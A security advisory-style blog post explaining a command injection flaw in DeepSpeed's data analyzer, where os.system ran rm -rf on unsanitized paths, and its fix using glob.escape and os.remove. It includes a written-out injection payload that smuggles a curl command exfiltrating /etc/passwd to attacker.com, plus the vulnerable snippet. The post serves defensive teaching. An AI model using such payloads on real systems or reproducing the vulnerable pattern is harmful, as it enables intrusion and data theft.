Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix
Introduction
Machine learning infrastructure is not immune to classic security vulnerabilities. In fact, as ML frameworks grow in complexity and adoption, they become increasingly attractive targets — and increasingly likely to carry the same security pitfalls found in any large software project. This post examines a critical command injection vulnerability discovered and patched in DeepSpeed, Microsoft's popular deep learning optimization library used by organizations training large-scale models worldwide.
The vulnerability lived in a single line of Python code. One call to os.system(). One unsanitized variable. And the potential for full arbitrary command execution on any machine running the affected data pipeline.
If you write Python code that touches the filesystem, spawns subprocesses, or processes user-supplied paths — this one is for you.
The Vulnerability Explained
What Went Wrong
Inside deepspeed/runtime/data_pipeline/data_sampling/data_analyzer.py, the init_metric_results method needed to clean up old metric files before creating new ones. The original implementation did this:
# VULNERABLE CODE — DO NOT USE
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")
At first glance, this looks like a harmless cleanup routine. But there are two deeply problematic choices here working together:
-
os.system()invokes a shell interpreter (/bin/shon Unix). This means the entire string is passed to the shell, which will happily interpret metacharacters like;,|,&&,`,$(), and&. -
metric_to_sample_fnameis derived from user-supplied input — specifically from dataset configuration values or file paths provided at runtime. There is no sanitization, escaping, or validation of this value before it is embedded in the shell command string.
How Could It Be Exploited?
The attack surface opens wherever a user or an external system can influence the metric_save_path or metric_name values passed into the data pipeline. In practice, these values often come from:
- Dataset configuration files (YAML/JSON)
- Command-line arguments
- Programmatic API calls from orchestration systems
- Shared storage paths in multi-tenant training environments
An attacker who controls either of these values can craft a payload that breaks out of the intended rm -rf command and executes arbitrary shell instructions.
Attack Scenario
Imagine a multi-tenant ML platform where users submit training jobs with their own dataset configurations. A malicious user submits the following as their metric_name:
foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar
The resulting shell command becomes:
rm -rf /data/metrics/foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar*
The shell executes all three commands in sequence:
1. ✅ Removes the metric files (the intended behavior)
2. 🚨 Exfiltrates /etc/passwd to an attacker-controlled server
3. 🚨 Executes any additional payload the attacker desires
In a cloud training environment, this could mean:
- Credential theft — reading cloud provider credentials from ~/.aws/credentials or instance metadata endpoints
- Data exfiltration — stealing training datasets, model weights, or proprietary code
- Lateral movement — using the compromised node as a pivot point into internal networks
- Denial of service — destroying training checkpoints or corrupting datasets
Even without a fully adversarial scenario, a accidentally malformed path containing spaces or special characters could cause silent failures or unintended file deletions — the rm -rf making any mistake potentially catastrophic.
Why os.system() Is Dangerous
The Python documentation itself warns against os.system() for exactly this reason. When you pass a string to os.system(), you are essentially doing this:
/bin/sh -c "<your string here>"
The shell is a powerful interpreter. Its job is to find and execute commands, expand variables, and evaluate expressions. That power is exactly what makes it dangerous when you feed it untrusted data.
This vulnerability class is well-documented:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- OWASP A03:2021: Injection
- CVSS Base Score: Typically 9.0+ (Critical) when user input reaches os.system() without sanitization
The Fix
What Changed
The fix is elegant in its simplicity: eliminate the shell entirely. Instead of asking a shell to delete files, use Python's own filesystem APIs, which operate directly on file paths without any shell interpretation.
Before (Vulnerable):
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")
After (Fixed):
import glob
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
os.remove(_f)
Why This Fix Works
Let's break down each component of the fix:
1. glob.escape() — Neutralizing Special Characters
glob.escape(metric_to_sample_fname)
glob.escape() escapes all special glob characters (*, ?, [, ]) in the input string. This ensures that if metric_to_sample_fname contains any characters that glob would normally treat as wildcards or special tokens, they are treated as literal characters instead.
This is the path sanitization that was entirely absent in the original code.
2. glob.glob() — Safe Pattern Expansion
glob.glob(f"{glob.escape(metric_to_sample_fname)}*")
The glob.glob() function expands the file pattern and returns a list of matching file paths. Critically:
- It never invokes a shell
- It operates purely in Python's filesystem layer
- It returns concrete, resolved file paths — no further interpretation occurs
The trailing * (outside the escaped portion) is intentional: it matches files like metric_to_sample_0, metric_to_sample_1, etc., which is the original intent of the cleanup.
3. os.remove() — Direct File Deletion
os.remove(_f)
os.remove() deletes a single file by path. It makes a direct syscall — no shell, no string interpolation, no command parsing. Each file returned by glob.glob() is deleted individually and safely.
The Security Improvement at a Glance
| Property | Before (os.system) | After (glob + os.remove) |
|---|---|---|
| Shell invoked? | ✅ Yes | ❌ No |
| Input sanitized? | ❌ No | ✅ Yes (glob.escape) |
| Metachar risk? | 🚨 Critical | ✅ None |
| Behavior on bad input | Arbitrary execution | Safe failure / no match |
| Intent preserved? | ✅ Yes | ✅ Yes |
The fix is a zero-functionality-change security improvement: the code does exactly what it always intended to do — clean up old metric files — but now does so without any possibility of shell injection.
Prevention & Best Practices
This vulnerability follows a pattern that appears regularly in Python codebases. Here's how to prevent it and detect it in your own projects.
1. Never Use os.system() with Variable Input
The rule is simple: if the string passed to os.system() contains any variable, it is potentially dangerous. Even variables you believe are safe can be influenced by upstream inputs you haven't considered.
# ❌ Always dangerous
os.system(f"rm -rf {some_path}*")
os.system("ls " + user_input)
# ✅ Use Python's filesystem APIs instead
import shutil, glob, os
for f in glob.glob(f"{glob.escape(some_path)}*"):
os.remove(f)
2. Prefer subprocess with List Arguments When You Must Spawn Processes
If you genuinely need to run an external command, use subprocess with a list of arguments (not a shell string) and shell=False (the default):
import subprocess
# ❌ Still vulnerable — shell=True defeats the purpose
subprocess.run(f"rm -rf {path}*", shell=True)
# ✅ Safe — no shell, arguments passed directly to execve
subprocess.run(["rm", "-rf", path], shell=False)
When arguments are passed as a list, they go directly to the OS execve syscall. The shell is never involved, so metacharacters are never interpreted.
3. Use glob.escape() Whenever Building Glob Patterns from External Input
import glob
# ❌ User input could contain *, ?, [, ]
pattern = f"{user_supplied_path}/*.log"
# ✅ Escape the user-supplied portion
pattern = f"{glob.escape(user_supplied_path)}/*.log"
4. Prefer Python-Native APIs Over Shell Commands
For common filesystem operations, Python's standard library has you covered without ever needing a shell:
| Shell Command | Python Equivalent |
|---|---|
rm -rf path |
shutil.rmtree(path) |
rm file |
os.remove(file) |
rm file* |
glob.glob() + os.remove() |
cp src dst |
shutil.copy2(src, dst) |
mv src dst |
shutil.move(src, dst) |
mkdir -p path |
os.makedirs(path, exist_ok=True) |
ls path |
os.listdir(path) |
5. Validate and Sanitize File Paths
When file paths originate from user input, configuration files, or external systems, validate them before use:
import os
def safe_metric_path(base_dir: str, metric_name: str) -> str:
# Allow only alphanumeric characters, hyphens, and underscores
import re
if not re.match(r'^[a-zA-Z0-9_\-]+$', metric_name):
raise ValueError(f"Invalid metric name: {metric_name!r}")
# Resolve and confirm the path stays within the expected directory
full_path = os.path.realpath(os.path.join(base_dir, metric_name))
if not full_path.startswith(os.path.realpath(base_dir)):
raise ValueError("Path traversal detected")
return full_path
6. Static Analysis Tools
Several tools can automatically detect os.system() calls and other dangerous patterns in Python code:
- Bandit — Python-specific security linter. The
B605rule flagsos.system()calls directly.
bash bandit -r your_project/ -t B605,B607 - Semgrep — Powerful pattern-matching tool with rules for command injection.
- CodeQL — GitHub's semantic code analysis engine with taint-tracking for injection vulnerabilities.
- OrbisAI Security — AI-powered scanner that detected this exact vulnerability automatically.
Adding these tools to your CI/CD pipeline means vulnerabilities like this one are caught before they ever reach production.
7. Security Standards References
- CWE-78: OS Command Injection
- OWASP Injection (A03:2021): The third most critical web application security risk
- OWASP Command Injection: Detailed attack patterns and mitigations
- Python Security Best Practices: Official Python docs on subprocess security
Conclusion
A single call to os.system() with an unsanitized variable is all it takes to turn a routine file cleanup into a critical security vulnerability. The lesson here isn't that the original developer was careless — it's that certain APIs are inherently dangerous when combined with variable input, and developers need to internalize which APIs those are.
The fix demonstrates something important: the most secure code is often the simplest code. Replacing a shell command with native Python filesystem operations didn't require complex cryptography, elaborate input validation, or architectural changes. It required recognizing that the shell was never necessary in the first place, and removing it entirely.
Key takeaways:
- 🚫 Avoid
os.system()— it invokes a shell, and shells interpret metacharacters - ✅ Use Python-native filesystem APIs (
os.remove(),shutil,pathlib) for file operations - 🔒 Use
glob.escape()when building glob patterns from external input - 🔍 Run Bandit or Semgrep in your CI pipeline to catch these patterns automatically
- 📋 Treat all external input as untrusted — including configuration files and dataset paths
Security vulnerabilities in ML infrastructure carry the same risks as vulnerabilities anywhere else — and sometimes higher, given the sensitive datasets and credentials that training environments typically handle. Secure coding practices aren't just for web applications. They belong in every line of code you ship.
This vulnerability was automatically detected and patched by OrbisAI Security. Automated security scanning helps catch issues like this before they reach production.